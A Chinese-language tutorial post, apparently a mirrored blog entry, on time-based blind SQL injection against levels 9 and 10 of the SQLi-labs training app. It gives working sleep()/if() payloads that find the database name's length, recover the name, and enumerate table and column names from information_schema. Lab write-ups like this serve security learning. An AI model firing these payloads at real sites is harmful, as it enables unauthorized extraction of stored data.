zoukankan      html  css  js  c++  java
  • SQLI DUMB SERIES-9&&10

    第五关、第八关以及第九关、第十关都是使用盲注,除了第五关说的双注入外,也可使用时间注入法

    (1)无论输入啥,都回显相同

    (2)

    ?id=1' and sleep(3) --+
    

     发现有明显延迟,说明可以使用时间注入,

    ?id=1' and if(length(database())=8 , sleep(5), 1) --+
    

     从1尝试到8发现有明显延迟,说明数据库名为八位

    (3)同样的爆库名

    ?id=1' and if(left(database(),1)='s' , sleep(5), 1) --+
    
    ?id=1' and if(left(database(),8)='security' , sleep(5), 1) --+
    

     继续尝试可得库名:security

    (4)爆表名

    ?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' , sleep(5), 1) --+
    

     改变Limit的第一个参数可以得到所有表名。

    (5)爆字段

    ?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 1,1),8)='password', sleep(5), 1) --+
    

     改变Limit的第一个参数可以得到user表中得所有字段。

    由于无法解释的神圣旨意,我们徒然地到处找你;你就是孤独,你就是神秘,比恒河或者日落还要遥远。。。。。。
  • 相关阅读:
    CSS中的单位简介
    grid-layout
    position
    form
    objects
    个人介绍
    第十二周作业:
    第十一周作业
    第十周web作业
    第九周作业
  • 原文地址:https://www.cnblogs.com/momoli/p/10678571.html
Copyright © 2011-2022 走看看